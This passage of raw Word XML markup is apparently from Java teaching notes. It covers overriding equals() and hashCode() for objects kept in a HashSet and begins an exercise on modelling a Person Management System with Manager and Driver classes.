        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB2E8B1" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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qual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ame</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3695AFC9" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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785718F" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456255FD" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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688998FC" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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hashCod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1BEDFBB" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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hashCode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1299B6CB" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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1591185" w14:textId="681E8112" w:rsidR="00682956" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291D8833" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="0059780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Now, when you add e1 and e2 to a Set, the set will consider them </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>equal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because their names are the same, and it will only keep one of them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFED02F" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="0059780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with Custom equals() and hashCode():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74768EE7" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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7735936"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Se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employeeSe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ashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03551B9F" w14:textId="77777777" w:rsidR="00682956" w:rsidRPr="00CE4B95"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7735936"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>employeeSe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wapnil"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6519F7" w14:textId="4970089D" w:rsidR="00682956" w:rsidRPr="00CE4B95"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7735936"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>employeeSe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wapnil"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFD6872" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="00597807">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="779CA9B0" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="0059780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stem.out.println(employeeSet.size());  // Output will be 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5026C1B1" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0059780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03CB884">
          <v:rect id="_x0000_i1902" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E18DC5" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="0059780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5D08C30A" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="008A3FE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ithout overriding equals() and hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The output will be 2 because the Set treats the two objects as different based on their memory reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FB2AD6" w14:textId="4063B55A" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="001A0C98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
        <w:jc w:val="both"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>With equals() and hashCode() overridden</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The output will be 1 because the Set considers the two objects equal based on their content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255433FA" w14:textId="77777777" w:rsidR="00597807" w:rsidRPr="00CE4B95" w:rsidRDefault="00597807" w:rsidP="00597807">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6B593A" w14:textId="299779A1" w:rsidR="004F747E" w:rsidRPr="00CE4B95" w:rsidRDefault="004F747E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="383" w:name="_Toc196307863"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00773FFA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Person Management System</w:t>
      </w:r>
      <w:r w:rsidR="00F00004" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>, Write model classes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="383"/>
    </w:p>
    <w:p w14:paraId="6524CDF5" w14:textId="77777777" w:rsidR="002B6B70" w:rsidRPr="00CE4B95" w:rsidRDefault="004F747E" w:rsidP="002B6B70">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="002B6B70" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">You are required to design a basic </w:t>
      </w:r>
      <w:r w:rsidR="002B6B70" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Person Management System</w:t>
      </w:r>
      <w:r w:rsidR="002B6B70" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java that models different types of people within an organization. The system should be able to manage and perform common operations for various person types such as </w:t>
      </w:r>
      <w:r w:rsidR="002B6B70" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Managers</w:t>
      </w:r>
      <w:r w:rsidR="002B6B70" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="002B6B70" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Drivers</w:t>
      </w:r>
      <w:r w:rsidR="002B6B70" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4AF26A" w14:textId="45909415" w:rsidR="004F747E" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6B70" w:rsidP="004F747E">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70684898" w14:textId="77777777" w:rsidR="002B6B70" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6B70" w:rsidP="002B6B70">
      <w:pPr>
        <w:ind w:left="1800" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Person</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB5F2DE" w14:textId="77777777" w:rsidR="002B6B70" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6B70" w:rsidP="002B6B70">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>- Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AE2B96" w14:textId="55779C0E" w:rsidR="002B6B70" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6B70" w:rsidP="002B6B70">
      <w:pPr>
        <w:ind w:left="2520" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>- Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCAFBCB" w14:textId="77777777" w:rsidR="002B6B70" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6B70" w:rsidP="002B6B70">
      <w:pPr>
        <w:ind w:left="1800" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Attributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292AA6F0" w14:textId="77777777" w:rsidR="002B6B70" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6B70" w:rsidP="002B6B70">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>- name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64531955" w14:textId="77777777" w:rsidR="002B6B70" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6B70" w:rsidP="002B6B70">
      <w:pPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>- age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FFAB0B" w14:textId="77777777" w:rsidR="002B6B70" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6B70" w:rsidP="002B6B70">
      <w:pPr>
        <w:ind w:left="2520" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>- don</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0551A4AF" w14:textId="77777777" w:rsidR="002B6B70" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6B70" w:rsidP="002B6B70">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>- Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28277F54" w14:textId="77777777" w:rsidR="002B6B70" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6B70" w:rsidP="002B6B70">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E4C845F" w14:textId="77777777" w:rsidR="002B6B70" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6B70" w:rsidP="002B6B70">
      <w:pPr>
        <w:ind w:left="1800" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287EF599" w14:textId="77777777" w:rsidR="002B6B70" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6B70" w:rsidP="002B6B70">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>- eat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A0B431" w14:textId="77777777" w:rsidR="002B6B70" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6B70" w:rsidP="002B6B70">
      <w:pPr>
        <w:ind w:left="2520" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>- doSleep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DB09E3" w14:textId="152D8BD4" w:rsidR="002B6B70" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6B70" w:rsidP="002B6B70">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>- doWork</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2842BF60" w14:textId="67503FB1" w:rsidR="004F747E" w:rsidRPr="00CE4B95" w:rsidRDefault="004F747E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27DD1883"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ManagementSystem</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802129C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3290CD47"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Base class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781FF821"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D7EF3EF"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otecte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0A611209"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otecte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age</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FDA0A3"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otecte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d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Date of Joining</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45085DFD"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otecte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address</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0A8567"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ACC018"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d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addres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9524657"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p>
    <w:p w14:paraId="7461477A"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ag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ge</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53000549"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do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don</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D7A600"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addres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ddress</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660817BA"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F833095"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EBA131"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ea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8939F34"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is eating."</w:t>
      </w:r>
